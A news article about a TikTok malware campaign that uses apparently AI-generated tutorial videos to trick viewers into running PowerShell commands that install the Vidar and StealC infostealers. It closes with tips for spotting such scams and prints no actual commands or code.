These AI-Generated TikTok Videos Are Tricking People Into Installing Malware
In recent years, TikTok has become a favorite target for scammers and cybercriminals spreading various types of malware, with the latest shadowy campaign promoting instructional videos that trick users into downloading information-stealing software onto their devices via ClickFix attacks.
The scheme, discovered by Trend Micro and reported by Bleeping Computer , directs users to execute commands to activate Windows and Microsoft Office, or premium features in CapCut and Spotify. One video, titled “Boost Your Spotify Experience Instantly — Here’s How!” has nearly half a million views.
These videos appear to be created using artificial intelligence, and while the software discussed in them is legitimate, the activation steps described in them are not and will ultimately result in users’ devices being infected with the Vidar and StealC malware.
TikTok’s engagement algorithm makes it easy for malicious videos like these to spread. In the past, cybercriminals have used TikTok’s popular “Invisible Challenge” to distribute the WASP Stealer malware, which can steal Discord accounts, passwords, credit cards, and crypto wallets. Fake crypto giveaways hosted on TikTok have used Elon Musk’s deepfakes (and threads around SpaceX and Tesla) to trick users into making “activation” deposits using Bitcoin.
How TikTok ClickFix Attacks Work
ClickFix is a social engineering tactic that uses fake error messages or CAPTCHA prompts to trick users into executing a command containing malicious code. Users will see a pop-up notification about a technical issue with instructions to copy and run a command (usually a PowerShell script) to “fix” the problem. The attack most often targets Windows users, but it has also been used on macOS and Linux.
In the current TikTok campaign, tutorial videos ask users to run a PowerShell command that installs the information-stealing malware Vidar or StealC. The former can take screenshots of the desktop and collect data ranging from logins and cookies to credit cards and crypto wallets. The latter targets web browsers and crypto wallets. Once run, the script will download a second PowerShell script, allowing it to automatically run when the device starts. It also saves data in a hidden directory and deletes temporary folders to avoid detection.
How to Spot Malicious TikTok Videos
Be careful when following tutorial videos served to you on TikTok (as well as unsolicited tech content in general). Check the source and only engage with those that are legitimate, such as those from the developer themselves. You should also look for signs of AI-generated content , which can be used to spread malware widely and quickly. In reality, these tutorials do not embed or deliver malicious code — the scheme relies on social engineering through verbal instructions, making the threat technically more difficult to detect.